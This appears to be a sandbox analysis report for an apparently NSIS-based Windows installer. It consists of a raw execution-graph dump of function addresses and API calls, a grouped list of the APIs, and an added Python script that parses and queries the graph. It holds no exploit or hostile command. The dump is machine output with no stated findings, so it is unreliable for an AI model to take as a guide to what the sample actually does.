4326 404521 GetDlgItem 4321->4326 4327 40465b SHBrowseForFolderW 4322->4327 4323 4046f5 4328 4067aa 18 API calls 4323->4328 4324 403df6 8 API calls 4329 404873 4324->4329 4330 4045a5 SetWindowTextW 4325->4330 4334 405d85 4 API calls 4325->4334 4331 40452f IsDlgButtonChecked 4326->4331 4326->4373 4327->4313 4333 404673 CoTaskMemFree 4327->4333 4338 4046fb 4328->4338 4332 403d6b 19 API calls 4330->4332 4331->4309 4336 4045c3 4332->4336 4337 40674e 3 API calls 4333->4337 4335 40459b 4334->4335 4335->4330 4342 40674e 3 API calls 4335->4342 4339 403d6b 19 API calls 4336->4339 4340 404680 4337->4340 4378 406035 lstrcpynW 4338->4378 4343 4045ce 4339->4343 4344 4046b7 SetDlgItemTextW 4340->4344 4349 406831 18 API calls 4340->4349 4342->4330 4376 403dc4 SendMessageW 4343->4376 4344->4313 4345 404712 4347 406328 3 API calls 4345->4347 4356 40471a 4347->4356 4348 4045d6 4350 406328 3 API calls 4348->4350 4351 40469f lstrcmpiW 4349->4351 4350->4314 4351->4344 4354 4046b0 lstrcatW 4351->4354 4352 40475c 4379 406035 lstrcpynW 4352->4379 4354->4344 4355 404765 4357 405d85 4 API calls 4355->4357 4356->4352 4360 40677d 2 API calls 4356->4360 4362 4047b1 4356->4362 4358 40476b GetDiskFreeSpaceW 4357->4358 4361 40478f MulDiv 4358->4361 4358->4362 4360->4356 4361->4362 4363 40480e 4362->4363 4380 4043d9 4362->4380 4364 404831 4363->4364 4366 40141d 80 API calls 4363->4366 4388 403db1 KiUserCallbackDispatcher 4364->4388 4366->4364 4367 4047ff 4369 404810 SetDlgItemTextW 4367->4369 4370 404804 4367->4370 4369->4363 4372 4043d9 21 API calls 4370->4372 4371 40484d 4371->4373 4389 403d8d 4371->4389 4372->4363 4373->4324 4375->4315 4376->4348 4377->4323 4378->4345 4379->4355 4381 4043f9 4380->4381 4382 406831 18 API calls 4381->4382 4383 404439 4382->4383 4384 406831 18 API calls 4383->4384 4385 404444 4384->4385 4386 406831 18 API calls 4385->4386 4387 404454 lstrlenW wsprintfW SetDlgItemTextW 4386->4387 4387->4367 4388->4371 4390 403da0 SendMessageW 4389->4390 4391 403d9b 4389->4391 
4390->4373 4391->4390 4392 401dd3 4393 401446 18 API calls 4392->4393 4394 401dda 4393->4394 4395 401446 18 API calls 4394->4395 4396 4018d3 4395->4396 4397 402e55 4398 40145c 18 API calls 4397->4398 4399 402e63 4398->4399 4400 402e79 4399->4400 4401 40145c 18 API calls 4399->4401 4402 405e5c 2 API calls 4400->4402 4401->4400 4403 402e7f 4402->4403 4427 405e7c GetFileAttributesW CreateFileW 4403->4427 4405 402e8c 4406 402f35 4405->4406 4407 402e98 GlobalAlloc 4405->4407 4410 4062cf 11 API calls 4406->4410 4408 402eb1 4407->4408 4409 402f2c CloseHandle 4407->4409 4428 403368 SetFilePointer 4408->4428 4409->4406 4412 402f45 4410->4412 4414 402f50 DeleteFileW 4412->4414 4415 402f63 4412->4415 4413 402eb7 4416 403336 ReadFile 4413->4416 4414->4415 4429 401435 4415->4429 4418 402ec0 GlobalAlloc 4416->4418 4419 402ed0 4418->4419 4420 402f04 WriteFile GlobalFree 4418->4420 4422 40337f 33 API calls 4419->4422 4421 40337f 33 API calls 4420->4421 4423 402f29 4421->4423 4426 402edd 4422->4426 4423->4409 4425 402efb GlobalFree 4425->4420 4426->4425 4427->4405 4428->4413 4430 404f9e 25 API calls 4429->4430 4431 401443 4430->4431 4432 401cd5 4433 401446 18 API calls 4432->4433 4434 401cdd 4433->4434 4435 401446 18 API calls 4434->4435 4436 401ce8 4435->4436 4437 40145c 18 API calls 4436->4437 4438 401cf1 4437->4438 4439 401d07 lstrlenW 4438->4439 4440 401d43 4438->4440 4441 401d11 4439->4441 4441->4440 4445 406035 lstrcpynW 4441->4445 4443 401d2c 4443->4440 4444 401d39 lstrlenW 4443->4444 4444->4440 4445->4443 4446 402cd7 4447 401446 18 API calls 4446->4447 4449 402c64 4447->4449 4448 402d17 ReadFile 4448->4449 4449->4446 4449->4448 4450 402d99 4449->4450 4451 402dd8 4452 4030e3 4451->4452 4453 402ddf 4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 
4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW 
SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 
4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 
3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 CoUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API 
calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 
4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 
Execution Graph

[Interactive call-graph view. The exported node and edge data (node id, function address, API names called by that function; src->dst edges) is not reproduced here.]

API functions named in the graph's nodes, grouped by area:

Process, module and system state: GetCommandLineW, GetModuleHandleA, GetModuleHandleW, GetModuleFileNameW, LoadLibraryA, GetProcAddress, GetVersion, GetSystemDirectoryW, GetWindowsDirectoryW, GetTempPathW, GetTickCount, GetLastError, Sleep, SetErrorMode, OleInitialize, CreateProcessW, GetCurrentProcess, ExitProcess, ExitWindowsEx, CloseHandle, GlobalAlloc, GlobalFree, and one import by ordinal (#17).

File system: CreateFileW, ReadFile, WriteFile, SetFilePointer, GetFileSize, GetFileAttributesW, SetFileAttributesW, CompareFileTime, SetFileTime, CopyFileW, MoveFileW, DeleteFileW, CreateDirectoryW, SetCurrentDirectoryW, FindFirstFileW, FindClose, GetFullPathNameW, GetShortPathNameW, SearchPathW, ExpandEnvironmentStringsW, GetPrivateProfileStringW, WritePrivateProfileStringW.

Registry: RegOpenKeyExW, RegQueryValueExW, RegEnumKeyW, RegEnumValueW, RegCloseKey.

Shell and folders: SHGetFileInfoW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, CoTaskMemFree.

String handling and conversion: lstrcpyA, lstrcpyW, lstrcpynW, lstrcatW, lstrlenA, lstrlenW, lstrcmpW, lstrcmpiA, lstrcmpiW, CharNextA, CharNextW, CharPrevW, wsprintfA, wsprintfW, wvsprintfW, MultiByteToWideChar, WideCharToMultiByte, MulDiv.

User interface: CreateDialogParamW, DestroyWindow, ShowWindow, EnableWindow, SetWindowPos, SetWindowTextW, GetWindowRect, ScreenToClient, GetClientRect, GetDlgItem, GetDlgItemTextW, SetDlgItemTextW, SendMessageW, PostQuitMessage, SetForegroundWindow, IsWindowEnabled, GetWindowLongW, SetWindowLongW, SetClassLongW, GetSystemMenu, EnableMenuItem, MessageBoxIndirectW, LoadImageW, ImageList_Destroy, InvalidateRect, GetSysColor, SetTextColor, SetBkMode, SetBkColor, CreateBrushIndirect, DeleteObject, KiUserCallbackDispatcher.
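The execution graph is exported from the report's interactive view as a flat token stream: a node is `<id> <hex address> [API names or "<n> API calls"]`, and an edge is `<src>-><dst>`. The Python below is an added example, not part of the Joe Sandbox report or its tooling; it parses that token format (the token rules are assumed from the extracted data), embeds a short excerpt copied from this report's graph as sample input, and answers the two questions an analyst usually asks of such a graph: which nodes call a given API, and whether one node can reach another.

```python
"""Parse a Joe Sandbox execution-graph text export and query it.

Added example (not Joe Sandbox code). Assumed token grammar, taken from the
extracted data: node = "<id> <6-hex-char address> [labels...]",
label = Win32 API name, "#<ordinal>", or "<n> API calls"; edge = "<src>-><dst>".
"""
import re
from collections import defaultdict, deque

NODE_ID = re.compile(r"^\d{1,5}$")                      # graph node ids (e.g. 3906)
ADDR = re.compile(r"^[0-9a-f]{6}$")                     # function address (e.g. 4038af)
EDGE = re.compile(r"^(\d+)->(\d+)$")                    # call edge
API_NAME = re.compile(r"^(?:[A-Za-z_]\w*|#\d+)$")       # API name or ordinal import

# Constructed sample: an excerpt copied from the report's graph export.
SAMPLE = """
3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907
3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980
3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW
3913 403947 3912->3913 3980->3910 3981->3912
3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3944 403c09 3941->3944
3948 406328 3 API calls 3944->3948 3952 403c12 3948->3952 3956 406328 3 API calls 3952->3956
3959 403c1b 3956->3959 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess
3959->3965 3969 403c39 3965->3969 3969->3960 3960->3939
3977 403b7f 4102 405c6b CreateProcessW 3977->4102 3979 403bd9 CloseHandle 3977->3979
"""


def parse_graph(text):
    """Return (nodes, edges): nodes[id] = {addr, apis, summarized_calls}, edges[src] = {dst,...}."""
    nodes, edges = {}, defaultdict(set)
    tokens = text.split()
    cur, i = None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:                                    # "src->dst"
            edges[m.group(1)].add(m.group(2))
            i += 1
            continue
        if NODE_ID.match(tok) and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            cur = tok                            # new node: id followed by address
            nodes[cur] = {"addr": tokens[i + 1], "apis": [], "summarized_calls": 0}
            i += 2
            continue
        if cur is None:                          # label token before any node: ignore
            i += 1
            continue
        if tok.isdigit() and tokens[i + 1:i + 3] == ["API", "calls"]:
            nodes[cur]["summarized_calls"] += int(tok)   # collapsed sub-graph summary
            i += 3
            continue
        if API_NAME.match(tok):                  # API name attached to the current node
            nodes[cur]["apis"].append(tok)
        i += 1
    return nodes, dict(edges)


def nodes_calling(nodes, api):
    """Node ids whose function calls the named API directly."""
    return {nid for nid, n in nodes.items() if api in n["apis"]}


def api_inventory(nodes):
    """Sorted set of every API name that appears in the graph."""
    return sorted({api for n in nodes.values() for api in n["apis"]})


def roots(nodes, edges):
    """Nodes with no incoming edge: the entry points of each graph region."""
    targets = {dst for dsts in edges.values() for dst in dsts}
    return sorted(nid for nid in nodes if nid not in targets)


def find_path(edges, src, dst):
    """Shortest call path src -> ... -> dst (BFS), or None if dst is unreachable."""
    prev, queue = {src: None}, deque([src])
    while queue:
        cur = queue.popleft()
        if cur == dst:
            path = []
            while cur is not None:
                path.append(cur)
                cur = prev[cur]
            return path[::-1]
        for nxt in sorted(edges.get(cur, ())):
            if nxt not in prev:
                prev[nxt] = cur
                queue.append(nxt)
    return None


if __name__ == "__main__":
    g_nodes, g_edges = parse_graph(SAMPLE)
    print("roots:", roots(g_nodes, g_edges))
    print("ExitWindowsEx callers:", nodes_calling(g_nodes, "ExitWindowsEx"))
    print("path 3936 -> 3960:", find_path(g_edges, "3936", "3960"))
```

Feed the whole export (or the report's JSON equivalent after flattening it to the same token shape) to `parse_graph`, then use `roots` to locate the entry regions and `find_path` to check whether a region that reaches a sensitive call such as ExitWindowsEx or CreateProcessW is actually connected to the entry point; a node that appears only as the root of its own small region is often a collapsed "<n> API calls" summary rather than dead code.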